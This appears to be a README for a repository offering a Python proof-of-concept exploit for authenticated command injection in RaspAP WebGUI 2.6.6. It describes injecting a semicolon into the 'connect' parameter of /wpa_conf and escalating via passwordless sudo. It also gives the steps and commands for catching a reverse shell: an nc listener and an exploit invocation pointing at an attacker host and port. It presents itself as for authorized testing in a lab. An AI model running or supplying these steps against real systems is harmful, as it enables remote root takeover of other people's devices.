A working Python proof-of-concept for the authenticated remote code execution vulnerability in RaspAP 2.6.6.
| Field | Details |
|---|---|
| Software | RaspAP WebGUI |
| Affected Version | 2.6.6 |
| Vulnerability Type | Command Injection → Remote Code Execution |
| Authentication Required | HTTP Basic Auth |
| Original Author | Moritz Gruber (aware7.de) |
| CVE | N/A (referenced on ExploitDB) |
RaspAP passes the connect POST parameter from the /wpa_conf endpoint directly to wpa_cli without sanitization:
An attacker with valid credentials can inject a semicolon to break out of the argument and execute arbitrary shell commands. The web process runs as www-data, which on default RaspAP installs has passwordless sudo rights — giving effective root execution.
- Authenticate via HTTP Basic Auth
- GET /wpa_conf → extract CSRF token from
- POST /wpa_conf → inject payload into 'connect' field
- www-data executes reverse shell → catch with nc listener
pip install requests beautifulsoup4 lxmlpython3 raspap_rce.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>Example:
# Start listener first
nc -lvnp 1337
# Run exploit
python3 raspap_rce.py 10.3.141.1 80 admin secret 10.3.141.77 1337- The original PoC by Moritz Gruber had a bug:
HTTPBasicAuthwas not mounted on the session object, causing all requests to return401 Unauthorized. This repo fixes that and adds proper error handling. - A
ReadTimeouton the POST request is expected and indicates success — the reverse shell hijacks the connection before the HTTP response is returned. - Tested against the HackTheBox WiFi Penetration Testing module lab environment.
This tool is intended for authorized penetration testing and security research only. Only use against systems you have explicit written permission to test. The author is not responsible for any misuse.